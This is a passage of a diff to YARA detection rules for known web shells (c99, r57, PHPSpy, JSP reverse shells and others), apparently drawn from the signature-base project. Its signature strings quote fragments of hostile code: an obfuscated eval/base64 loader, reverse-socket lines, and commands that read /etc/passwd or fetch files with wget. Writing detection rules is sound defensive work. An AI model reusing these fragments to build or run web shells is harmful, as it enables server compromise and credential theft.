+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2544-L2561"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3889-L3901"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ae33048856440e25972aa5483b60e775f50f60a9ef5e77a58edd60eacdcd9ee3"
-		score = 70
+		hash = "fab20902862736e24aaae275af5e049c"
+		logic_hash = "e38a4f5c23371705f9bbf2db8e65d68074554edc1022576166e76d40e06bc039"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "3e4ba470d4c38765e4b16ed930facf2c"
-		hash1 = "3f4d454d27ecc0013e783ed921eeecde"
-		hash2 = "aa17b71bb93c6789911bd1c9df834ff9"
 
 	strings:
-		$s0 = "<a href=\"javascript:godir(\\''.$drive->Path.'/\\');"
-		$s7 = "p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all"
+		$s0 = "#Use: python wh_bindshell.py [port] [password]"
+		$s2 = "python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"" fullword
+		$s3 = "#bugz: ctrl+c etc =script stoped=" fullword
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Shell_Phpspy_2005_Full_Phpspy_2005_Lite_Phpspy_2006_Arabicspy_PHPSPY_Hkrkoz
+rule SIGNATURE_BASE_Lurm_Safemod_On_Cgi
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "41a0560a-b22e-5028-8ad1-710c5758cb1d"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file lurm_safemod_on.cgi.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "74e77260-a547-5553-8430-2620f8549f50"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2562-L2583"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3902-L3914"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5da06481cf789e71969a5b54a33bfab41e08a1961cc056604a696203fef48422"
-		score = 70
+		hash = "5ea4f901ce1abdf20870c214b3231db3"
+		logic_hash = "d308ad6cda92fa437b9a4c46cd1b97fb0138aa8d0010256bda56a64ced1c7875"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "791708057d8b429d91357d38edf43cc0"
-		hash1 = "b68bfafc6059fd26732fa07fb6f7f640"
-		hash2 = "42f211cec8032eb0881e87ebdb3d7224"
-		hash3 = "40a1f840111996ff7200d18968e42cfe"
-		hash4 = "e0202adff532b28ef1ba206cf95962f2"
-		hash5 = "0712e3dc262b4e1f98ed25760b206836"
-		hash6 = "802f5cae46d394b297482fd0c27cb2fc"
 
 	strings:
-		$s0 = "$mainpath_info           = explode('/', $mainpath);" fullword
-		$s6 = "if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == \"d"
+		$s0 = "Network security team :: CGI Shell" fullword
+		$s1 = "#########################<<KONEC>>#####################################" fullword
+		$s2 = "##if (!defined$param{pwd}){$param{pwd}='Enter_Password'};##" fullword
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_807_Dm_Jspspyjdk5_M_Cofigrue
+rule SIGNATURE_BASE_C99Madshell_V2_0_Php_Php
 {
 	meta:
-		description = "Web Shell - from files 807.jsp, dm.jsp, JspSpyJDK5.jsp, m.jsp, cofigrue.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file c99madshell_v2.0.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "b0724920-dc1e-5819-a99b-618a9a7e1eca"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2584-L2603"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3915-L3925"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0fc7ac740e147bd3703dac74743b19148aa7bb359cc5f347acf3b0dbe26bf752"
-		score = 70
+		hash = "d27292895da9afa5b60b9d3014f39294"
+		logic_hash = "07922511d9dfdd32f6b1f47479fca2063b773024a20dcab6f5cf4d56d66c3397"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
-		hash1 = "14e9688c86b454ed48171a9d4f48ace8"
-		hash2 = "341298482cf90febebb8616426080d1d"
-		hash3 = "88fc87e7c58249a398efd5ceae636073"
-		hash4 = "349ec229e3f8eda0f9eb918c74a8bf4c"
 
 	strings:
-		$s1 = "url_con.setRequestProperty(\"REFERER\", \"\"+fckal+\"\");" fullword
-		$s9 = "FileLocalUpload(uc(dx())+sxm,request.getRequestURL().toString(),  \"GBK\");" fullword
+		$s2 = "eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXef"
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Dive_Shell_1_0_Emperor_Hacking_Team_Xxx
+rule SIGNATURE_BASE_Backupsql_Php_Often_With_C99Shell
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file backupsql.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2604-L2621"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3926-L3937"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8bf11041a16060fa32431adfe33727863355bae7fec2cf841dcc919092db5c80"
-		score = 70
+		hash = "ab1a06ab1a1fe94e3f3b7f80eedbc12f"
+		logic_hash = "7c64e3d4e5815859c51f05cb376f72ea266b31193f3f4588526005e167ebabad"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "1b5102bdc41a7bc439eea8f0010310a5"
-		hash1 = "f8a6d5306fb37414c5c772315a27832f"
-		hash2 = "37cb1db26b1b0161a4bf678a6b4565bd"
 
 	strings:
-		$s1 = "if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== fals"
-		$s9 = "if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {" fullword
+		$s2 = "//$message.= \"--{$mime_boundary}\\n\" .\"Content-Type: {$fileatt_type};\\n\" ."
+		$s4 = "$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_404_Data_In_Jfolder_Jfolder01_Xxx
+rule SIGNATURE_BASE_Uploader_Php_Php
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file uploader.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "62aa783b-f12f-5bb5-9d96-7aee1666788b"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2622-L2644"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3938-L3950"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "171b811c1b93f99f3070692a91a0462f80d9d52ecf26d7fb7297a8bdd9a4c014"
-		score = 70
+		hash = "0b53b67bb3b004a8681e1458dd1895d0"
+		logic_hash = "6e6ffc4cad2a956cb2b6667928bac5996cf95cd36f43ba789144c46726471f07"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "7066f4469c3ec20f4890535b5f299122"
-		hash1 = "9f54aa7b43797be9bab7d094f238b4ff"
-		hash2 = "793b3d0a740dbf355df3e6f68b8217a4"
-		hash3 = "8979594423b68489024447474d113894"
-		hash4 = "ec482fc969d182e5440521c913bab9bd"
-		hash5 = "f98d2b33cd777e160d1489afed96de39"
-		hash6 = "4b4c12b3002fad88ca6346a873855209"
-		hash7 = "c93d5bdf5cf62fe22e299d0f2b865ea7"
-		hash8 = "e9a5280f77537e23da2545306f6a19ad"
 
 	strings:
-		$s4 = "&nbsp;<TEXTAREA NAME=\"cqq\" ROWS=\"20\" COLS=\"100%\"><%=sbCmd.toString()%></TE"
+		$s2 = "move_uploaded_file($userfile, \"entrika.php\"); " fullword
+		$s3 = "Send this file: <INPUT NAME=\"userfile\" TYPE=\"file\">" fullword
+		$s4 = "<INPUT TYPE=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000\">" fullword
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Reverse_Jsp_Reverse_Jspbd
+rule SIGNATURE_BASE_Telnet_Pl
 {
 	meta:
-		description = "Web Shell - from files jsp-reverse.jsp, jsp-reverse.jsp, jspbd.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file telnet.pl.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "be4de017-e929-5dd3-a60e-f187456b1a55"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2645-L2663"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3951-L3962"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cd7409bb6ace3044f3d0bf380133c4fe4a7c0c0309f9d800b397439aa95f81fc"
-		score = 50
+		hash = "dd9dba14383064e219e29396e242c1ec"
+		logic_hash = "2d1abc52fc70ce664a19e49e6fa4175bc8d8785dee332d5273323479d9628a8c"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "8b0e6779f25a17f0ffb3df14122ba594"
-		hash1 = "ea87f0c1f0535610becadf5a98aca2fc"
-		hash2 = "7d5e9732766cf5b8edca9b7ae2b6028f"
 
 	strings:
-		$s0 = "osw = new BufferedWriter(new OutputStreamWriter(os));" fullword
-		$s7 = "sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());" fullword
-		$s9 = "isr = new BufferedReader(new InputStreamReader(is));" fullword
+		$s0 = "W A R N I N G: Private Server"
+		$s2 = "$Message = q$<pre><font color=\"#669999\"> _____  _____  _____          _____   "
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_400_In_Jfolder_Jfolder01_Jsp_Leo_Warn_Webshell_Nc
+rule SIGNATURE_BASE_W3D_Php_Php
 {
 	meta:
-		description = "Web Shell - from files 400.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp, webshell-nc.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file w3d.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "1a4e3c84-2d3b-5245-bccc-9a5f59b9fc17"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2664-L2688"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3963-L3975"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "74e31e51f2cb46a042e8591ffb44fe68fb591d202c8171c6afb556eddb381f6f"
-		score = 70
+		hash = "987f66b29bfb209a0b4f097f84f57c3b"
+		logic_hash = "33f948a1ae4474daddd788df84fa8baabf4390ec242cad9a6a51dac0152d3b75"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "36331f2c81bad763528d0ae00edf55be"
-		hash1 = "793b3d0a740dbf355df3e6f68b8217a4"
-		hash2 = "8979594423b68489024447474d113894"
-		hash3 = "ec482fc969d182e5440521c913bab9bd"
-		hash4 = "f98d2b33cd777e160d1489afed96de39"
-		hash5 = "4b4c12b3002fad88ca6346a873855209"
-		hash6 = "e9a5280f77537e23da2545306f6a19ad"
-		hash7 = "598eef7544935cf2139d1eada4375bb5"
 
 	strings:
-		$s0 = "sbFolder.append(\"<tr><td >&nbsp;</td><td>\");" fullword
-		$s1 = "return filesize / intDivisor + \".\" + strAfterComma + \" \" + strUnit;" fullword
-		$s5 = "FileInfo fi = (FileInfo) ht.get(\"cqqUploadFile\");" fullword
-		$s6 = "<input type=\"hidden\" name=\"cmd\" value=\"<%=strCmd%>\">" fullword
+		$s0 = "W3D Shell"
+		$s1 = "By: Warpboy"
+		$s2 = "No Query Executed"
 
 	condition:
 		2 of them
 }
-rule SIGNATURE_BASE_Webshell_2_520_Job_Jspwebshell_1_2_Ma1_Ma4_2
+rule SIGNATURE_BASE_Webshell_Cgi
 {
 	meta:
-		description = "Web Shell - from files 2.jsp, 520.jsp, job.jsp, JspWebshell 1.2.jsp, ma1.jsp, ma4.jsp, 2.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file WebShell.cgi.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "b768bb72-64e8-545a-9123-3d5889b58a82"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2689-L2711"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3976-L3987"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "49614b2a42210fa134f85fa52c66e12809f2bb9eaf56c17b69d21e5fbfc8888b"
-		score = 70
+		hash = "bc486c2e00b5fc3e4e783557a2441e6f"
+		logic_hash = "8908ced96284de6b6d5ae693ba54c49a6333bbe5780d951cbacc91b4dde027df"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "64a3bf9142b045b9062b204db39d4d57"
-		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
-		hash2 = "56c005690da2558690c4aa305a31ad37"
-		hash3 = "70a0ee2624e5bbe5525ccadc467519f6"
-		hash4 = "532b93e02cddfbb548ce5938fe2f5559"
-		hash5 = "6e0fa491d620d4af4b67bae9162844ae"
-		hash6 = "7eabe0f60975c0c73d625b7ddf7b9cbd"
 
 	strings:
-		$s1 = "while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {" fullword
-		$s6 = "password = (String)session.getAttribute(\"password\");" fullword
-		$s7 = "insReader = new InputStreamReader(proc.getInputStream(), Charset.forName(\"GB231"
+		$s0 = "WebShell.cgi"
+		$s2 = "<td><code class=\"entry-[% if entry.all_rights %]mine[% else"
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Shell_2008_2009Mssql_Phpspy_2005_Full_Phpspy_2006_Arabicspy_Hkrkoz
+rule SIGNATURE_BASE_Winx_Shell_Html
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "41a0560a-b22e-5028-8ad1-710c5758cb1d"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file WinX Shell.html.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "fe02d995-4375-5ce9-aabe-fae5d29278d3"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2712-L2736"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3988-L4000"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "140af92ab61059649a872bef96b916f2c402fd9891301d4a1ba1f389a45af003"
-		score = 60
+		hash = "17ab5086aef89d4951fe9b7c7a561dda"
+		logic_hash = "4248f807d66990946523ba7b92d795c2c40429182389d9bf3f4a972e246b50c6"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "791708057d8b429d91357d38edf43cc0"
-		hash1 = "3e4ba470d4c38765e4b16ed930facf2c"
-		hash2 = "aa17b71bb93c6789911bd1c9df834ff9"
-		hash3 = "b68bfafc6059fd26732fa07fb6f7f640"
-		hash4 = "40a1f840111996ff7200d18968e42cfe"
-		hash5 = "e0202adff532b28ef1ba206cf95962f2"
-		hash6 = "802f5cae46d394b297482fd0c27cb2fc"
 
 	strings:
-		$s0 = "$tabledump .= \"'\".mysql_escape_string($row[$fieldcounter]).\"'\";" fullword
-		$s5 = "while(list($kname, $columns) = @each($index)) {" fullword
-		$s6 = "$tabledump = \"DROP TABLE IF EXISTS $table;\\n\";" fullword
-		$s9 = "$tabledump .= \"   PRIMARY KEY ($colnames)\";" fullword
-		$fn = "filename: backup"
+		$s0 = "WinX Shell"
+		$s1 = "Created by greenwood from n57"
+		$s2 = "<td><font color=\\\"#990000\\\">Win Dir:</font></td>"
 
 	condition:
-		2 of ( $s* ) and not $fn
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Gfs_Sh_R57Shell_R57Shell127_Sniper_SA_Xxx
+rule SIGNATURE_BASE_Dx_Php_Php
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file Dx.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "67d0bccb-d39a-5e30-bdc0-801525ebddd7"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2737-L2762"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4001-L4013"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "24d93f9ae5e174873a32abdf8dca6c00f03cbb4c5e2ad531ac7fa34f8fc90794"
-		score = 70
+		hash = "9cfe372d49fe8bf2fac8e1c534153d9b"
+		logic_hash = "ab43ddcf317eb4db890ca9750dc6bbc19b06b806339a67c82216df02bc2e8446"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "a2516ac6ee41a7cf931cbaef1134a9e4"
-		hash1 = "ef43fef943e9df90ddb6257950b3538f"
-		hash2 = "ae025c886fbe7f9ed159f49593674832"
-		hash3 = "911195a9b7c010f61b66439d9048f400"
-		hash4 = "697dae78c040150daff7db751fc0c03c"
-		hash5 = "513b7be8bd0595c377283a7c87b44b2e"
-		hash6 = "1d912c55b96e2efe8ca873d6040e3b30"
-		hash7 = "e5b2131dd1db0dbdb43b53c5ce99016a"
-		hash8 = "4108f28a9792b50d95f95b9e5314fa1e"
-		hash9 = "41af6fd253648885c7ad2ed524e0692d"
-		hash10 = "6fcc283470465eed4870bcc3e2d7f14d"
 
 	strings:
-		$s0 = "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI"
-		$s11 = "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KIC"
+		$s0 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"
+		$s2 = "$DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Util"
+		$s3 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERVER['HTTP"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Itsec_Phpjackal_Itsecteam_Shell_Jhn
+rule SIGNATURE_BASE_Csh_Php_Php
 {
 	meta:
-		description = "Web Shell - from files itsec.php, PHPJackal.php, itsecteam_shell.php, jHn.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file csh.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "da691516-d6c9-5c4b-85c3-f1cd7fc96ae7"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2763-L2782"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4014-L4027"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0c97731c28f59a6fbab2b7882fae171da8d71add73ec92ab6093dec57fcd7207"
-		score = 70
+		hash = "194a9d3f3eac8bc56d9a7c55c016af96"
+		logic_hash = "2a74e06a9fd59d7a577041b49403738904239fb011f9bfe2fb665165991b9c98"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "8ae9d2b50dc382f0571cd7492f079836"
-		hash1 = "e2830d3286001d1455479849aacbbb38"
-		hash2 = "bd6d3b2763c705a01cc2b3f105a25fa4"
-		hash3 = "40c6ecf77253e805ace85f119fe1cebb"
 
 	strings:
-		$s0 = "$link=pg_connect(\"host=$host dbname=$db user=$user password=$pass\");" fullword
-		$s6 = "while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|"
-		$s9 = "while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+"
+		$s0 = ".::[c0derz]::. web-shell"
+		$s1 = "http://c0derz.org.ua"
+		$s2 = "vint21h@c0derz.org.ua"
+		$s3 = "$name='63a9f0ea7bb98050796b649e85481845';//root"
 
 	condition:
-		2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Shell_Ci_Biz_Was_Here_C100_V_Xxx
+rule SIGNATURE_BASE_Phpinj_Php_Php
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file pHpINJ.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "7bf54ef4-a3d8-51c6-8db7-bf8947e992ed"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2783-L2803"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4028-L4040"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a7841dec442877648a589045849f7f1b80316a30dda5a44ccc4bb626dbd2cdea"
-		score = 70
+		hash = "d7a4b0df45d34888d5a09f745e85733f"
+		logic_hash = "5d39fd31cdaae7765267ce8a35a2fdcf86e7f0de40d4f303fb0f219c0fc04e40"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "f2fa878de03732fbf5c86d656467ff50"
-		hash1 = "27786d1e0b1046a1a7f67ee41c64bf4c"
-		hash2 = "68c0629d08b1664f5bcce7d7f5f71d22"
 
 	strings:
-		$s2 = "if ($data{0} == \"\\x99\" and $data{1} == \"\\x01\") {return \"Error: \".$stri"
-		$s3 = "<OPTION VALUE=\"find /etc/ -type f -perm -o+w 2> /dev/null\""
-		$s4 = "<OPTION VALUE=\"cat /proc/version /proc/cpuinfo\">CPUINFO" fullword
-		$s7 = "<OPTION VALUE=\"wget http://ftp.powernet.com.tr/supermail/de"
-		$s9 = "<OPTION VALUE=\"cut -d: -f1,2,3 /etc/passwd | grep ::\">USER"
+		$s1 = "News Remote PHP Shell Injection"
+		$s3 = "Php Shell <br />" fullword
+		$s4 = "<input type = \"text\" name = \"url\" value = \""
 
 	condition:
 		2 of them
 }
-rule SIGNATURE_BASE_Webshell_NIX_REMOTE_WEB_SHELL_NIX_REMOTE_WEB_Xxx1
+rule SIGNATURE_BASE_Sig_2008_Php_Php
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file 2008.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "bfa3caa9-70a5-536b-a887-58427eee43df"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2804-L2823"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4041-L4054"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "95d25e9dc75a9af91e23b8c53acb384616f5d8a78605200bdb94f016a7f160f6"
-		score = 70
+		hash = "3e4ba470d4c38765e4b16ed930facf2c"
+		logic_hash = "a437dc3dc836e93c7a691f7a000c4a4ae574ba95b3a216394ba42538beb9c0f7"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "0b19e9de790cd2f4325f8c24b22af540"
-		hash1 = "f3ca29b7999643507081caab926e2e74"
